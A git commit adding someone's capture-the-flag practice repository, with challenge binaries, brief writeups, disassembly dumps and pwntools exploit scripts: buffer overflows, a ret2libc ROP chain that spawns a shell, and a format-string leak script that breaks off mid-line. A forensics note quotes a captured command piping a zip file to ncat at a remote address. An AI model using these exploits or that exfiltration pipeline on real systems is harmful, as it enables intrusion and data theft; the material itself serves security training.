commit 9ea8ecac7456707aa81eadc5bde034e1d5d33864 Author: cato447 Date: Mon Dec 25 07:06:20 2023 +0100 added all ctfs diff --git a/ForeverCTF/gdb/gdb_exec b/ForeverCTF/gdb/gdb_exec new file mode 100755 index 0000000..31bf035 Binary files /dev/null and b/ForeverCTF/gdb/gdb_exec differ diff --git a/ForeverCTF/jump/input b/ForeverCTF/jump/input new file mode 100644 index 0000000..b1e8a0d Binary files /dev/null and b/ForeverCTF/jump/input differ diff --git a/ForeverCTF/jump/jump b/ForeverCTF/jump/jump new file mode 100755 index 0000000..09c0ee9 Binary files /dev/null and b/ForeverCTF/jump/jump differ diff --git a/ForeverCTF/overflow/overflow b/ForeverCTF/overflow/overflow new file mode 100755 index 0000000..f287ff4 Binary files /dev/null and b/ForeverCTF/overflow/overflow differ diff --git a/ForeverCTF/simple_checker/guesses.txt b/ForeverCTF/simple_checker/guesses.txt new file mode 100644 index 0000000..6c25131 --- /dev/null +++ b/ForeverCTF/simple_checker/guesses.txt @@ -0,0 +1 @@ +flag = utflag{simple} diff --git a/ForeverCTF/tricky_indices/flag.txt b/ForeverCTF/tricky_indices/flag.txt new file mode 100644 index 0000000..518f255 --- /dev/null +++ b/ForeverCTF/tricky_indices/flag.txt @@ -0,0 +1 @@ +bullshit_flag diff --git a/ForeverCTF/tricky_indices/trickyindices b/ForeverCTF/tricky_indices/trickyindices new file mode 100755 index 0000000..de5f43e Binary files /dev/null and b/ForeverCTF/tricky_indices/trickyindices differ diff --git a/ForeverCTF/tricky_indices/writeup.md b/ForeverCTF/tricky_indices/writeup.md new file mode 100644 index 0000000..a368acf --- /dev/null +++ b/ForeverCTF/tricky_indices/writeup.md @@ -0,0 +1,5 @@ +# Tricky Indices + +To exploit this binary enter -112 as the first index and -12 as the second index. +This dumps the flag because no bounds were checked and the flag is located below +the flag in memory diff --git a/ForeverCTF/uint64_t/.gdb_history b/ForeverCTF/uint64_t/.gdb_history new file mode 100644 index 0000000..bca70f3 --- /dev/null +++ b/ForeverCTF/uint64_t/.gdb_history @@ -0,0 +1 @@ +q diff --git a/ForeverCTF/uint64_t/a.out b/ForeverCTF/uint64_t/a.out new file mode 100755 index 0000000..45339ec Binary files /dev/null and b/ForeverCTF/uint64_t/a.out differ diff --git a/ForeverCTF/uint64_t/writeup.md b/ForeverCTF/uint64_t/writeup.md new file mode 100644 index 0000000..145f79d --- /dev/null +++ b/ForeverCTF/uint64_t/writeup.md @@ -0,0 +1,11 @@ +# uint64_t challange + +Observations: +Current balance is stored as a uint64_t +There is no check if you have enough money to buy a doge. + +Exploit Path: +1. Buy dodges until u get uint64_MAX ammount of money. +2. Buy the win +3. get the flag with `cat /flag.txt` + diff --git a/ForeverCTF/xor/decrypt_binary.py b/ForeverCTF/xor/decrypt_binary.py new file mode 100644 index 0000000..4cda071 --- /dev/null +++ b/ForeverCTF/xor/decrypt_binary.py @@ -0,0 +1,9 @@ +import sys + +binary = bytearray(open(sys.argv[1], 'rb').read()) +size = len(binary) + +for i in range (size): + binary[i] = binary[i] ^ 0x41 + +open(sys.argv[2], 'wb').write(binary) diff --git a/ForeverCTF/xor/decrypted_xor b/ForeverCTF/xor/decrypted_xor new file mode 100644 index 0000000..c71eb35 Binary files /dev/null and b/ForeverCTF/xor/decrypted_xor differ diff --git a/ForeverCTF/xor/xor b/ForeverCTF/xor/xor new file mode 100755 index 0000000..69d2e49 Binary files /dev/null and b/ForeverCTF/xor/xor differ diff --git a/hackerpole/forensics/cap_ou_pcap/decode.py b/hackerpole/forensics/cap_ou_pcap/decode.py new file mode 100644 index 0000000..74db7be --- /dev/null +++ b/hackerpole/forensics/cap_ou_pcap/decode.py @@ -0,0 +1,17 @@ +#!/usr/bin/env python3 + +import zipfile +import os + +data = bytes.fromhex("504b0304140000000800a231825065235c39420000004700000008001c00666c61672e7478745554090003bfc8855ebfc8855e75780b000104e803000004e80300000dc9c11180300804c0bfd5840408bc33630356e00568c2b177ddef9eeb5a8fe6ee06ce8e5684f0845997192aad44ecaedc7f8e1acc4e3ec1a8eda164d48c28c77b7c504b01021e03140000000800a231825065235c394200000047000000080018000000000001000000a48100000000666c61672e7478745554050003bfc8855e75780b000104e803000004e8030000504b050600000000010001004e000000840000000000") +with open("flag.zip", "wb") as f: + f.write(data) + +with zipfile.ZipFile("flag.zip", "r") as zip_ref: + zip_ref.extractall(".") + +with open("flag.txt", "r") as flag_file: + print(flag_file.read()) + +os.remove("flag.zip") +os.remove("flag.txt") diff --git a/hackerpole/forensics/cap_ou_pcap/notes.md b/hackerpole/forensics/cap_ou_pcap/notes.md new file mode 100644 index 0000000..bee3ae7 --- /dev/null +++ b/hackerpole/forensics/cap_ou_pcap/notes.md @@ -0,0 +1,5 @@ +Command that leaks the flag: +xxd -p Documents/flag.zip | tr -d '\n' | ncat 172.20.20.133 20200 + +> flag is encoded in hex +flag: 504b0304140000000800a231825065235c39420000004700000008001c00666c61672e7478745554090003bfc8855ebfc8855e75780b000104e803000004e80300000dc9c11180300804c0bfd5840408bc33630356e00568c2b177ddef9eeb5a8fe6ee06ce8e5684f0845997192aad44ecaedc7f8e1acc4e3ec1a8eda164d48c28c77b7c504b01021e03140000000800a231825065235c394200000047000000080018000000000001000000a48100000000666c61672e7478745554050003bfc8855e75780b000104e803000004e8030000504b050600000000010001004e000000840000000000 diff --git a/hackerpole/pwn/bofbof/bofbof b/hackerpole/pwn/bofbof/bofbof new file mode 100755 index 0000000..c127f64 Binary files /dev/null and b/hackerpole/pwn/bofbof/bofbof differ diff --git a/hackerpole/pwn/bofbof/docker-compose.yml b/hackerpole/pwn/bofbof/docker-compose.yml new file mode 100644 index 0000000..94020ac --- /dev/null +++ b/hackerpole/pwn/bofbof/docker-compose.yml @@ -0,0 +1,6 @@ +version: '3.9' +services: + bofbof: + image: anssi/fcsc2021-pwn-bofbof:latest + ports: + - "4000:4000" diff --git a/hackerpole/pwn/bofbof/dump.txt b/hackerpole/pwn/bofbof/dump.txt new file mode 100644 index 0000000..851e907 --- /dev/null +++ b/hackerpole/pwn/bofbof/dump.txt @@ -0,0 +1,216 @@ + +bofbof: file format elf64-x86-64 + + +Disassembly of section .init: + +0000000000001000 <_init>: + 1000: 48 83 ec 08 sub rsp,0x8 + 1004: 48 8b 05 dd 2f 00 00 mov rax,QWORD PTR [rip+0x2fdd] # 3fe8 <__gmon_start__> + 100b: 48 85 c0 test rax,rax + 100e: 74 02 je 1012 <_init+0x12> + 1010: ff d0 call rax + 1012: 48 83 c4 08 add rsp,0x8 + 1016: c3 ret + +Disassembly of section .plt: + +0000000000001020 <.plt>: + 1020: ff 35 e2 2f 00 00 push QWORD PTR [rip+0x2fe2] # 4008 <_GLOBAL_OFFSET_TABLE_+0x8> + 1026: ff 25 e4 2f 00 00 jmp QWORD PTR [rip+0x2fe4] # 4010 <_GLOBAL_OFFSET_TABLE_+0x10> + 102c: 0f 1f 40 00 nop DWORD PTR [rax+0x0] + +0000000000001030 : + 1030: ff 25 e2 2f 00 00 jmp QWORD PTR [rip+0x2fe2] # 4018 + 1036: 68 00 00 00 00 push 0x0 + 103b: e9 e0 ff ff ff jmp 1020 <.plt> + +0000000000001040 : + 1040: ff 25 da 2f 00 00 jmp QWORD PTR [rip+0x2fda] # 4020 + 1046: 68 01 00 00 00 push 0x1 + 104b: e9 d0 ff ff ff jmp 1020 <.plt> + +0000000000001050 : + 1050: ff 25 d2 2f 00 00 jmp QWORD PTR [rip+0x2fd2] # 4028 + 1056: 68 02 00 00 00 push 0x2 + 105b: e9 c0 ff ff ff jmp 1020 <.plt> + +0000000000001060 : + 1060: ff 25 ca 2f 00 00 jmp QWORD PTR [rip+0x2fca] # 4030 + 1066: 68 03 00 00 00 push 0x3 + 106b: e9 b0 ff ff ff jmp 1020 <.plt> + +0000000000001070 : + 1070: ff 25 c2 2f 00 00 jmp QWORD PTR [rip+0x2fc2] # 4038 + 1076: 68 04 00 00 00 push 0x4 + 107b: e9 a0 ff ff ff jmp 1020 <.plt> + +0000000000001080 : + 1080: ff 25 ba 2f 00 00 jmp QWORD PTR [rip+0x2fba] # 4040 + 1086: 68 05 00 00 00 push 0x5 + 108b: e9 90 ff ff ff jmp 1020 <.plt> + +Disassembly of section .plt.got: + +0000000000001090 <__cxa_finalize@plt>: + 1090: ff 25 62 2f 00 00 jmp QWORD PTR [rip+0x2f62] # 3ff8 <__cxa_finalize@GLIBC_2.2.5> + 1096: 66 90 xchg ax,ax + +Disassembly of section .text: + +00000000000010a0 <_start>: + 10a0: 31 ed xor ebp,ebp + 10a2: 49 89 d1 mov r9,rdx + 10a5: 5e pop rsi + 10a6: 48 89 e2 mov rdx,rsp + 10a9: 48 83 e4 f0 and rsp,0xfffffffffffffff0 + 10ad: 50 push rax + 10ae: 54 push rsp + 10af: 4c 8d 05 da 01 00 00 lea r8,[rip+0x1da] # 1290 <__libc_csu_fini> + 10b6: 48 8d 0d 73 01 00 00 lea rcx,[rip+0x173] # 1230 <__libc_csu_init> + 10bd: 48 8d 3d db 00 00 00 lea rdi,[rip+0xdb] # 119f
+ 10c4: ff 15 16 2f 00 00 call QWORD PTR [rip+0x2f16] # 3fe0 <__libc_start_main@GLIBC_2.2.5> + 10ca: f4 hlt + 10cb: 0f 1f 44 00 00 nop DWORD PTR [rax+rax*1+0x0] + +00000000000010d0 : + 10d0: 48 8d 3d 81 2f 00 00 lea rdi,[rip+0x2f81] # 4058 + 10d7: 48 8d 05 7a 2f 00 00 lea rax,[rip+0x2f7a] # 4058 + 10de: 48 39 f8 cmp rax,rdi + 10e1: 74 15 je 10f8 + 10e3: 48 8b 05 ee 2e 00 00 mov rax,QWORD PTR [rip+0x2eee] # 3fd8 <_ITM_deregisterTMCloneTable> + 10ea: 48 85 c0 test rax,rax + 10ed: 74 09 je 10f8 + 10ef: ff e0 jmp rax + 10f1: 0f 1f 80 00 00 00 00 nop DWORD PTR [rax+0x0] + 10f8: c3 ret + 10f9: 0f 1f 80 00 00 00 00 nop DWORD PTR [rax+0x0] + +0000000000001100 : + 1100: 48 8d 3d 51 2f 00 00 lea rdi,[rip+0x2f51] # 4058 + 1107: 48 8d 35 4a 2f 00 00 lea rsi,[rip+0x2f4a] # 4058 + 110e: 48 29 fe sub rsi,rdi + 1111: 48 89 f0 mov rax,rsi + 1114: 48 c1 ee 3f shr rsi,0x3f + 1118: 48 c1 f8 03 sar rax,0x3 + 111c: 48 01 c6 add rsi,rax + 111f: 48 d1 fe sar rsi,1 + 1122: 74 14 je 1138 + 1124: 48 8b 05 c5 2e 00 00 mov rax,QWORD PTR [rip+0x2ec5] # 3ff0 <_ITM_registerTMCloneTable> + 112b: 48 85 c0 test rax,rax + 112e: 74 08 je 1138 + 1130: ff e0 jmp rax + 1132: 66 0f 1f 44 00 00 nop WORD PTR [rax+rax*1+0x0] + 1138: c3 ret + 1139: 0f 1f 80 00 00 00 00 nop DWORD PTR [rax+0x0] + +0000000000001140 <__do_global_dtors_aux>: + 1140: 80 3d 19 2f 00 00 00 cmp BYTE PTR [rip+0x2f19],0x0 # 4060 + 1147: 75 2f jne 1178 <__do_global_dtors_aux+0x38> + 1149: 55 push rbp + 114a: 48 83 3d a6 2e 00 00 cmp QWORD PTR [rip+0x2ea6],0x0 # 3ff8 <__cxa_finalize@GLIBC_2.2.5> + 1151: 00 + 1152: 48 89 e5 mov rbp,rsp + 1155: 74 0c je 1163 <__do_global_dtors_aux+0x23> + 1157: 48 8b 3d f2 2e 00 00 mov rdi,QWORD PTR [rip+0x2ef2] # 4050 <__dso_handle> + 115e: e8 2d ff ff ff call 1090 <__cxa_finalize@plt> + 1163: e8 68 ff ff ff call 10d0 + 1168: c6 05 f1 2e 00 00 01 mov BYTE PTR [rip+0x2ef1],0x1 # 4060 + 116f: 5d pop rbp + 1170: c3 ret + 1171: 0f 1f 80 00 00 00 00 nop DWORD PTR [rax+0x0] + 1178: c3 ret + 1179: 0f 1f 80 00 00 00 00 nop DWORD PTR [rax+0x0] + +0000000000001180 : + 1180: e9 7b ff ff ff jmp 1100 + +0000000000001185 : + 1185: 55 push rbp + 1186: 48 89 e5 mov rbp,rsp + 1189: 48 8d 3d 78 0e 00 00 lea rdi,[rip+0xe78] # 2008 <_IO_stdin_used+0x8> + 1190: e8 ab fe ff ff call 1040 + 1195: bf 01 00 00 00 mov edi,0x1 + 119a: e8 e1 fe ff ff call 1080 + +000000000000119f
: + 119f: 55 push rbp + 11a0: 48 89 e5 mov rbp,rsp + 11a3: 48 83 ec 30 sub rsp,0x30 + 11a7: 48 b8 41 41 41 41 41 movabs rax,0x4141414141414141 + 11ae: 41 41 41 + 11b1: 48 89 45 f8 mov QWORD PTR [rbp-0x8],rax + 11b5: 48 8d 3d 54 0e 00 00 lea rdi,[rip+0xe54] # 2010 <_IO_stdin_used+0x10> + 11bc: b8 00 00 00 00 mov eax,0x0 + 11c1: e8 8a fe ff ff call 1050 + 11c6: 48 8b 05 8b 2e 00 00 mov rax,QWORD PTR [rip+0x2e8b] # 4058 + 11cd: 48 89 c7 mov rdi,rax + 11d0: e8 9b fe ff ff call 1070 + 11d5: 48 8d 45 d0 lea rax,[rbp-0x30] + 11d9: 48 89 c7 mov rdi,rax + 11dc: b8 00 00 00 00 mov eax,0x0 + 11e1: e8 7a fe ff ff call 1060 + 11e6: 48 b8 41 41 41 41 41 movabs rax,0x4141414141414141 + 11ed: 41 41 41 + 11f0: 48 39 45 f8 cmp QWORD PTR [rbp-0x8],rax + 11f4: 74 26 je 121c + 11f6: 48 b8 88 77 66 55 44 movabs rax,0x1122334455667788 + 11fd: 33 22 11 + 1200: 48 39 45 f8 cmp QWORD PTR [rbp-0x8],rax + 1204: 75 0a jne 1210 + 1206: b8 00 00 00 00 mov eax,0x0 + 120b: e8 75 ff ff ff call 1185 + 1210: 48 8d 3d 1d 0e 00 00 lea rdi,[rip+0xe1d] # 2034 <_IO_stdin_used+0x34> + 1217: e8 14 fe ff ff call 1030 + 121c: b8 00 00 00 00 mov eax,0x0 + 1221: c9 leave + 1222: c3 ret + 1223: 66 2e 0f 1f 84 00 00 cs nop WORD PTR [rax+rax*1+0x0] + 122a: 00 00 00 + 122d: 0f 1f 00 nop DWORD PTR [rax] + +0000000000001230 <__libc_csu_init>: + 1230: 41 57 push r15 + 1232: 4c 8d 3d af 2b 00 00 lea r15,[rip+0x2baf] # 3de8 <__frame_dummy_init_array_entry> + 1239: 41 56 push r14 + 123b: 49 89 d6 mov r14,rdx + 123e: 41 55 push r13 + 1240: 49 89 f5 mov r13,rsi + 1243: 41 54 push r12 + 1245: 41 89 fc mov r12d,edi + 1248: 55 push rbp + 1249: 48 8d 2d a0 2b 00 00 lea rbp,[rip+0x2ba0] # 3df0 <__do_global_dtors_aux_fini_array_entry> + 1250: 53 push rbx + 1251: 4c 29 fd sub rbp,r15 + 1254: 48 83 ec 08 sub rsp,0x8 + 1258: e8 a3 fd ff ff call 1000 <_init> + 125d: 48 c1 fd 03 sar rbp,0x3 + 1261: 74 1b je 127e <__libc_csu_init+0x4e> + 1263: 31 db xor ebx,ebx + 1265: 0f 1f 00 nop DWORD PTR [rax] + 1268: 4c 89 f2 mov rdx,r14 + 126b: 4c 89 ee mov rsi,r13 + 126e: 44 89 e7 mov edi,r12d + 1271: 41 ff 14 df call QWORD PTR [r15+rbx*8] + 1275: 48 83 c3 01 add rbx,0x1 + 1279: 48 39 dd cmp rbp,rbx + 127c: 75 ea jne 1268 <__libc_csu_init+0x38> + 127e: 48 83 c4 08 add rsp,0x8 + 1282: 5b pop rbx + 1283: 5d pop rbp + 1284: 41 5c pop r12 + 1286: 41 5d pop r13 + 1288: 41 5e pop r14 + 128a: 41 5f pop r15 + 128c: c3 ret + 128d: 0f 1f 00 nop DWORD PTR [rax] + +0000000000001290 <__libc_csu_fini>: + 1290: c3 ret + +Disassembly of section .fini: + +0000000000001294 <_fini>: + 1294: 48 83 ec 08 sub rsp,0x8 + 1298: 48 83 c4 08 add rsp,0x8 + 129c: c3 ret diff --git a/hackerpole/pwn/bofbof/exploit.py b/hackerpole/pwn/bofbof/exploit.py new file mode 100644 index 0000000..5ffefc9 --- /dev/null +++ b/hackerpole/pwn/bofbof/exploit.py @@ -0,0 +1,11 @@ +from pwn import remote, log, p64, time + +with remote("localhost", 4000, fam="ipv4") as p: + key = 0x1122334455667788 + payload = b"\x00" * 0x28 + p64(key) + log.info(f"Sending payload {payload} | len: {hex(len(payload))}") + p.sendline(payload) + # wait for system to spawn a shell + time.sleep(0.1) + p.sendline(b"cat flag.txt") + log.info(p.recvregex(b"FCSC\{[0-9a-fA-F]{64}\}")) diff --git a/hackerpole/pwn/bonus_points/docker-compose.yml b/hackerpole/pwn/bonus_points/docker-compose.yml new file mode 100644 index 0000000..7d34b4c --- /dev/null +++ b/hackerpole/pwn/bonus_points/docker-compose.yml @@ -0,0 +1,6 @@ +version: '3.9' +services: + bonus-points: + image: anssi/fcsc2021-pwn-bonus-points:latest + ports: + - "4000:4000" diff --git a/hackerpole/pwn/bonus_points/exploit.py b/hackerpole/pwn/bonus_points/exploit.py new file mode 100644 index 0000000..2fe3cc7 --- /dev/null +++ b/hackerpole/pwn/bonus_points/exploit.py @@ -0,0 +1,6 @@ +from pwn import remote, log + +with remote("localhost", 4000, fam="ipv4") as p: + p.recvuntil(b"?\n") + p.sendline(b"-100") + log.info(p.recvregex("FCSC\{[0-9a-fA-F]{64}\}")) diff --git a/hackerpole/pwn/pwn_poney/docker-compose.yml b/hackerpole/pwn/pwn_poney/docker-compose.yml new file mode 100644 index 0000000..ed865de --- /dev/null +++ b/hackerpole/pwn/pwn_poney/docker-compose.yml @@ -0,0 +1,6 @@ +version: '3.9' +services: + poney: + image: anssi/fcsc2020-pwn-poney:latest + ports: + - "4000:4000" diff --git a/hackerpole/pwn/pwn_poney/dump.txt b/hackerpole/pwn/pwn_poney/dump.txt new file mode 100644 index 0000000..f66fa71 --- /dev/null +++ b/hackerpole/pwn/pwn_poney/dump.txt @@ -0,0 +1,210 @@ + +poney: file format elf64-x86-64 + + +Disassembly of section .init: + +0000000000400528 <_init>: + 400528: 48 83 ec 08 sub rsp,0x8 + 40052c: 48 8b 05 b5 0a 20 00 mov rax,QWORD PTR [rip+0x200ab5] # 600fe8 <__gmon_start__> + 400533: 48 85 c0 test rax,rax + 400536: 74 02 je 40053a <_init+0x12> + 400538: ff d0 call rax + 40053a: 48 83 c4 08 add rsp,0x8 + 40053e: c3 ret + +Disassembly of section .plt: + +0000000000400540 <.plt>: + 400540: ff 35 72 0a 20 00 push QWORD PTR [rip+0x200a72] # 600fb8 <_GLOBAL_OFFSET_TABLE_+0x8> + 400546: ff 25 74 0a 20 00 jmp QWORD PTR [rip+0x200a74] # 600fc0 <_GLOBAL_OFFSET_TABLE_+0x10> + 40054c: 0f 1f 40 00 nop DWORD PTR [rax+0x0] + +Disassembly of section .plt.got: + +0000000000400550 : + 400550: ff 25 72 0a 20 00 jmp QWORD PTR [rip+0x200a72] # 600fc8 + 400556: 66 90 xchg ax,ax + +0000000000400558 : + 400558: ff 25 72 0a 20 00 jmp QWORD PTR [rip+0x200a72] # 600fd0 + 40055e: 66 90 xchg ax,ax + +0000000000400560 : + 400560: ff 25 72 0a 20 00 jmp QWORD PTR [rip+0x200a72] # 600fd8 + 400566: 66 90 xchg ax,ax + +0000000000400568 : + 400568: ff 25 82 0a 20 00 jmp QWORD PTR [rip+0x200a82] # 600ff0 + 40056e: 66 90 xchg ax,ax + +0000000000400570 <__isoc99_scanf@plt>: + 400570: ff 25 82 0a 20 00 jmp QWORD PTR [rip+0x200a82] # 600ff8 <__isoc99_scanf@GLIBC_2.7> + 400576: 66 90 xchg ax,ax + +Disassembly of section .text: + +0000000000400580 <_start>: + 400580: 31 ed xor ebp,ebp + 400582: 49 89 d1 mov r9,rdx + 400585: 5e pop rsi + 400586: 48 89 e2 mov rdx,rsp + 400589: 48 83 e4 f0 and rsp,0xfffffffffffffff0 + 40058d: 50 push rax + 40058e: 54 push rsp + 40058f: 49 c7 c0 50 07 40 00 mov r8,0x400750 + 400596: 48 c7 c1 e0 06 40 00 mov rcx,0x4006e0 + 40059d: 48 c7 c7 89 06 40 00 mov rdi,0x400689 + 4005a4: ff 15 36 0a 20 00 call QWORD PTR [rip+0x200a36] # 600fe0 <__libc_start_main@GLIBC_2.2.5> + 4005aa: f4 hlt + 4005ab: 0f 1f 44 00 00 nop DWORD PTR [rax+rax*1+0x0] + +00000000004005b0 : + 4005b0: b8 17 10 60 00 mov eax,0x601017 + 4005b5: 55 push rbp + 4005b6: 48 2d 10 10 60 00 sub rax,0x601010 + 4005bc: 48 83 f8 0e cmp rax,0xe + 4005c0: 48 89 e5 mov rbp,rsp + 4005c3: 76 1b jbe 4005e0 + 4005c5: b8 00 00 00 00 mov eax,0x0 + 4005ca: 48 85 c0 test rax,rax + 4005cd: 74 11 je 4005e0 + 4005cf: 5d pop rbp + 4005d0: bf 10 10 60 00 mov edi,0x601010 + 4005d5: ff e0 jmp rax + 4005d7: 66 0f 1f 84 00 00 00 nop WORD PTR [rax+rax*1+0x0] + 4005de: 00 00 + 4005e0: 5d pop rbp + 4005e1: c3 ret + 4005e2: 0f 1f 40 00 nop DWORD PTR [rax+0x0] + 4005e6: 66 2e 0f 1f 84 00 00 cs nop WORD PTR [rax+rax*1+0x0] + 4005ed: 00 00 00 + +00000000004005f0 : + 4005f0: be 10 10 60 00 mov esi,0x601010 + 4005f5: 55 push rbp + 4005f6: 48 81 ee 10 10 60 00 sub rsi,0x601010 + 4005fd: 48 c1 fe 03 sar rsi,0x3 + 400601: 48 89 e5 mov rbp,rsp + 400604: 48 89 f0 mov rax,rsi + 400607: 48 c1 e8 3f shr rax,0x3f + 40060b: 48 01 c6 add rsi,rax + 40060e: 48 d1 fe sar rsi,1 + 400611: 74 15 je 400628 + 400613: b8 00 00 00 00 mov eax,0x0 + 400618: 48 85 c0 test rax,rax + 40061b: 74 0b je 400628 + 40061d: 5d pop rbp + 40061e: bf 10 10 60 00 mov edi,0x601010 + 400623: ff e0 jmp rax + 400625: 0f 1f 00 nop DWORD PTR [rax] + 400628: 5d pop rbp + 400629: c3 ret + 40062a: 66 0f 1f 44 00 00 nop WORD PTR [rax+rax*1+0x0] + +0000000000400630 <__do_global_dtors_aux>: + 400630: 80 3d e1 09 20 00 00 cmp BYTE PTR [rip+0x2009e1],0x0 # 601018 + 400637: 75 11 jne 40064a <__do_global_dtors_aux+0x1a> + 400639: 55 push rbp + 40063a: 48 89 e5 mov rbp,rsp + 40063d: e8 6e ff ff ff call 4005b0 + 400642: 5d pop rbp + 400643: c6 05 ce 09 20 00 01 mov BYTE PTR [rip+0x2009ce],0x1 # 601018 + 40064a: f3 c3 repz ret + 40064c: 0f 1f 40 00 nop DWORD PTR [rax+0x0] + +0000000000400650 : + 400650: bf e8 0d 60 00 mov edi,0x600de8 + 400655: 48 83 3f 00 cmp QWORD PTR [rdi],0x0 + 400659: 75 05 jne 400660 + 40065b: eb 93 jmp 4005f0 + 40065d: 0f 1f 00 nop DWORD PTR [rax] + 400660: b8 00 00 00 00 mov eax,0x0 + 400665: 48 85 c0 test rax,rax + 400668: 74 f1 je 40065b + 40066a: 55 push rbp + 40066b: 48 89 e5 mov rbp,rsp + 40066e: ff d0 call rax + 400670: 5d pop rbp + 400671: e9 7a ff ff ff jmp 4005f0 + +0000000000400676 : + 400676: 55 push rbp + 400677: 48 89 e5 mov rbp,rsp + 40067a: 48 8d 3d e7 00 00 00 lea rdi,[rip+0xe7] # 400768 <_IO_stdin_used+0x8> + 400681: e8 d2 fe ff ff call 400558 + 400686: 90 nop + 400687: 5d pop rbp + 400688: c3 ret + +0000000000400689
: + 400689: 55 push rbp + 40068a: 48 89 e5 mov rbp,rsp + 40068d: 48 83 ec 20 sub rsp,0x20 + 400691: 48 8d 3d e0 00 00 00 lea rdi,[rip+0xe0] # 400778 <_IO_stdin_used+0x18> + 400698: e8 b3 fe ff ff call 400550 + 40069d: 48 8d 3d 0c 01 00 00 lea rdi,[rip+0x10c] # 4007b0 <_IO_stdin_used+0x50> + 4006a4: b8 00 00 00 00 mov eax,0x0 + 4006a9: e8 b2 fe ff ff call 400560 + 4006ae: 48 8b 05 5b 09 20 00 mov rax,QWORD PTR [rip+0x20095b] # 601010 + 4006b5: 48 89 c7 mov rdi,rax + 4006b8: e8 ab fe ff ff call 400568 + 4006bd: 48 8d 45 e0 lea rax,[rbp-0x20] + 4006c1: 48 89 c6 mov rsi,rax + 4006c4: 48 8d 3d ea 00 00 00 lea rdi,[rip+0xea] # 4007b5 <_IO_stdin_used+0x55> + 4006cb: b8 00 00 00 00 mov eax,0x0 + 4006d0: e8 9b fe ff ff call 400570 <__isoc99_scanf@plt> + 4006d5: b8 00 00 00 00 mov eax,0x0 + 4006da: c9 leave + 4006db: c3 ret + 4006dc: 0f 1f 40 00 nop DWORD PTR [rax+0x0] + +00000000004006e0 <__libc_csu_init>: + 4006e0: 41 57 push r15 + 4006e2: 41 56 push r14 + 4006e4: 41 89 ff mov r15d,edi + 4006e7: 41 55 push r13 + 4006e9: 41 54 push r12 + 4006eb: 4c 8d 25 e6 06 20 00 lea r12,[rip+0x2006e6] # 600dd8 <__frame_dummy_init_array_entry> + 4006f2: 55 push rbp + 4006f3: 48 8d 2d e6 06 20 00 lea rbp,[rip+0x2006e6] # 600de0 <__do_global_dtors_aux_fini_array_entry> + 4006fa: 53 push rbx + 4006fb: 49 89 f6 mov r14,rsi + 4006fe: 49 89 d5 mov r13,rdx + 400701: 4c 29 e5 sub rbp,r12 + 400704: 48 83 ec 08 sub rsp,0x8 + 400708: 48 c1 fd 03 sar rbp,0x3 + 40070c: e8 17 fe ff ff call 400528 <_init> + 400711: 48 85 ed test rbp,rbp + 400714: 74 20 je 400736 <__libc_csu_init+0x56> + 400716: 31 db xor ebx,ebx + 400718: 0f 1f 84 00 00 00 00 nop DWORD PTR [rax+rax*1+0x0] + 40071f: 00 + 400720: 4c 89 ea mov rdx,r13 + 400723: 4c 89 f6 mov rsi,r14 + 400726: 44 89 ff mov edi,r15d + 400729: 41 ff 14 dc call QWORD PTR [r12+rbx*8] + 40072d: 48 83 c3 01 add rbx,0x1 + 400731: 48 39 dd cmp rbp,rbx + 400734: 75 ea jne 400720 <__libc_csu_init+0x40> + 400736: 48 83 c4 08 add rsp,0x8 + 40073a: 5b pop rbx + 40073b: 5d pop rbp + 40073c: 41 5c pop r12 + 40073e: 41 5d pop r13 + 400740: 41 5e pop r14 + 400742: 41 5f pop r15 + 400744: c3 ret + 400745: 90 nop + 400746: 66 2e 0f 1f 84 00 00 cs nop WORD PTR [rax+rax*1+0x0] + 40074d: 00 00 00 + +0000000000400750 <__libc_csu_fini>: + 400750: f3 c3 repz ret + +Disassembly of section .fini: + +0000000000400754 <_fini>: + 400754: 48 83 ec 08 sub rsp,0x8 + 400758: 48 83 c4 08 add rsp,0x8 + 40075c: c3 ret diff --git a/hackerpole/pwn/pwn_poney/exploit.py b/hackerpole/pwn/pwn_poney/exploit.py new file mode 100644 index 0000000..902961f --- /dev/null +++ b/hackerpole/pwn/pwn_poney/exploit.py @@ -0,0 +1,34 @@ +from pwn import remote, log, p64, u64, time + +with remote("localhost", 4000, fam="ipv4") as p: + p.recvuntil(b">>> ") + payload = b"A" * 0x20 + payload += p64(0x601100) # set rbp + payload += p64(0x400743) # pop rdi + payload += p64(0x600fc8) # puts got + payload += p64(0x400550) # puts plt + payload += p64(0x400689) # main addr + log.info(payload) + p.sendline(payload) + leak = p.recvuntil(b"\n", drop=True) + p.clean() + puts_addr = u64(leak+b"\x00"*2) + puts_offset = 0x68f90 + libc_base = puts_addr - puts_offset + system_offset = 0x3f480 + system_addr = libc_base + system_offset + bin_sh_offset = 0x161c19 + bin_sh_addr = libc_base + bin_sh_offset + log.info(f"puts_addr: {hex(puts_addr)}") + log.info(f"libc_base: {hex(libc_base)}") + log.info(f"system_addr: {hex(system_addr)}") + log.info(f"bin_sh_addr: {hex(bin_sh_addr)}") + payload2 = b"B" * 0x28 + payload2 += p64(0x400743) + payload2 += p64(bin_sh_addr) + payload2 += p64(system_addr) + log.info(payload2) + p.sendline(payload2) + time.sleep(0.1) + p.sendline(b"cat flag.txt") + log.info(p.clean().decode()) diff --git a/hackerpole/pwn/pwn_poney/libc-2.24.so b/hackerpole/pwn/pwn_poney/libc-2.24.so new file mode 100755 index 0000000..be3d782 Binary files /dev/null and b/hackerpole/pwn/pwn_poney/libc-2.24.so differ diff --git a/hackerpole/pwn/pwn_poney/poney b/hackerpole/pwn/pwn_poney/poney new file mode 100755 index 0000000..da99842 Binary files /dev/null and b/hackerpole/pwn/pwn_poney/poney differ diff --git a/htb/challenges/pwn/what_does_the_f_say/core b/htb/challenges/pwn/what_does_the_f_say/core new file mode 100644 index 0000000..405f619 Binary files /dev/null and b/htb/challenges/pwn/what_does_the_f_say/core differ diff --git a/htb/challenges/pwn/what_does_the_f_say/exploit.py b/htb/challenges/pwn/what_does_the_f_say/exploit.py new file mode 100644 index 0000000..f27bf97 --- /dev/null +++ b/htb/challenges/pwn/what_does_the_f_say/exploit.py @@ -0,0 +1,62 @@ +from pwn import * + +def pop_rdi(binary_base, value): + payload = p64(binary_base + 0x18bb) + payload += p64(value) + return payload + +def scan_money(p, start): + log.debug(p.clean().decode()) + p.sendline(b"1") + log.debug("Sending 1") + log.debug(p.clean().decode()) + log.debug("Sending 2") + p.sendline(b"2") + log.debug(p.clean().decode()) + payload = "|".join(["%{}$p".format(i) for i in range(start,start+3)]) + log.debug(f"Sending payload: {payload}") + p.sendline(payload.encode()) + leak = p.clean().split(b"|") + log.debug(leak) + index_message = leak[2].find(b"\n\n") + if b"You have less than 20 space 